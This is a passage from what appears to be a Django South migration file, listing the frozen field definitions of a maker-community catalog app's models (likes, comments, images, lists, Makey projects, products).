'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.articleemail': {
'Meta': {'object_name': 'ArticleEmail'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'email_subscriptions'", 'null': 'True', 'to': "orm['catalog.ArticleTag']"}),
'temp_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.articletag': {
'Meta': {'object_name': 'ArticleTag'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url_snippet': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'catalog.cfistoreitem': {
'Meta': {'object_name': 'CfiStoreItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'item': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalog.Product']", 'unique': 'True'}),
'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cfi_store_item_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeCfiStoreItem']", 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.collection': {
'Meta': {'object_name': 'Collection'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collections'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.comment': {
'Meta': {'ordering': "['-added_time']", 'object_name': 'Comment'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'answer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['catalog.Answer']"}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['catalog.Question']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.documentation': {
'Meta': {'object_name': 'Documentation'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.emailcollect': {
'Meta': {'object_name': 'EmailCollect'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '30'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'catalog.favoritemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'FavoriteMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.image': {
'Meta': {'object_name': 'Image'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'full_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_s3': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'large_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'small_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'images'", 'null': 'True', 'to': u"orm['auth.User']"})
},
'catalog.instructablestep': {
'Meta': {'ordering': "['-step']", 'object_name': 'InstructableStep'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iid': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'step': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'default': 'None', 'max_length': '200', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'words': ('django.db.models.fields.IntegerField', [], {'default': '-1'})
},
'catalog.inventory': {
'Meta': {'unique_together': "(('part', 'space'),)", 'object_name': 'Inventory'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'part': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_part'", 'to': "orm['catalog.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_space'", 'to': "orm['catalog.Space']"})
},
'catalog.like': {
'Meta': {'object_name': 'Like'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likearticle': {
'Meta': {'unique_together': "(('user', 'article'),)", 'object_name': 'LikeArticle'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Article']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likecfistoreitem': {
'Meta': {'unique_together': "(('user', 'cfi_store_item'),)", 'object_name': 'LikeCfiStoreItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'cfi_store_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.CfiStoreItem']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likechannel': {
'Meta': {'unique_together': "(('user', 'channel'),)", 'object_name': 'LikeChannel'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ArticleTag']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likecomment': {
'Meta': {'unique_together': "(('user', 'comment'),)", 'object_name': 'LikeComment'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Comment']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeimage': {
'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likelisting': {
'Meta': {'unique_together': "(('user', 'listing'),)", 'object_name': 'LikeListing'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'listing': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Listing']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'LikeMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'makeylikes'", 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likenote': {
'Meta': {'unique_together': "(('user', 'note'),)", 'object_name': 'LikeNote'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'note': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Note']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproduct': {
'Meta': {'unique_together': "(('user', 'product'),)", 'object_name': 'LikeProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproductdescription': {
'Meta': {'unique_together': "(('user', 'product_description'),)", 'object_name': 'LikeProductDescription'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product_description': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductDescription']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproductimage': {
'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeProductImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductImage']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproducttutorial': {
'Meta': {'unique_together': "(('user', 'tutorial', 'product'),)", 'object_name': 'LikeProductTutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeshop': {
'Meta': {'unique_together': "(('user', 'shop'),)", 'object_name': 'LikeShop'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likevideo': {
'Meta': {'unique_together': "(('user', 'video'),)", 'object_name': 'LikeVideo'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Video']"})
},
'catalog.list': {
'Meta': {'object_name': 'List'},
'access': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'access'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.ListItem']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owner'", 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.listgroup': {
'Meta': {'object_name': 'ListGroup'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.List']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.listing': {
'Meta': {'object_name': 'Listing'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'content': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'catalog.listitem': {
'Meta': {'object_name': 'ListItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'createdby': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.location': {
'Meta': {'object_name': 'Location'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.logidenticalproduct': {
'Meta': {'object_name': 'LogIdenticalProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product1'", 'to': "orm['catalog.Product']"}),
'product2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product2'", 'to': "orm['catalog.Product']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.makey': {
'Meta': {'unique_together': "(('user', 'slug'),)", 'object_name': 'Makey'},
'about': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'added_time_staff_pick': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'as_part': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'as_makey'", 'null': 'True', 'to': "orm['catalog.Product']"}),
'as_part_new': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'as_makey'", 'null': 'True', 'to': "orm['catalog.NewProduct']"}),
'collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collaborators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeycomments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Comment']"}),
'cover_pic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'derived_from': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forked_as'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'documentations': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeydocumentations'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Documentation']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff_pick': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'made_in': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'makeys_made_in'", 'null': 'True', 'to': "orm['catalog.Space']"}),
'mentors': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'modules_used': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'used_in'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'new_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys_parts'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'new_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys_tools'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'new_users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}),
'notes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeynotes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Note']"}),
'removed_collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makey_removed'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyvideos'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Video']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'why': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'catalog.makeyimage': {
'Meta': {'object_name': 'MakeyImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey_id': ('django.db.models.fields.IntegerField', [], {}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.newinventory': {
'Meta': {'unique_together': "(('part', 'space'),)", 'object_name': 'NewInventory'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'part': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'new_inventory_part'", 'to': "orm['catalog.NewProduct']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'new_inventory_space'", 'to': "orm['catalog.Space']"})
},
'catalog.newproduct': {
'Meta': {'object_name': 'NewProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.newuser': {
'Meta': {'object_name': 'NewUser'},
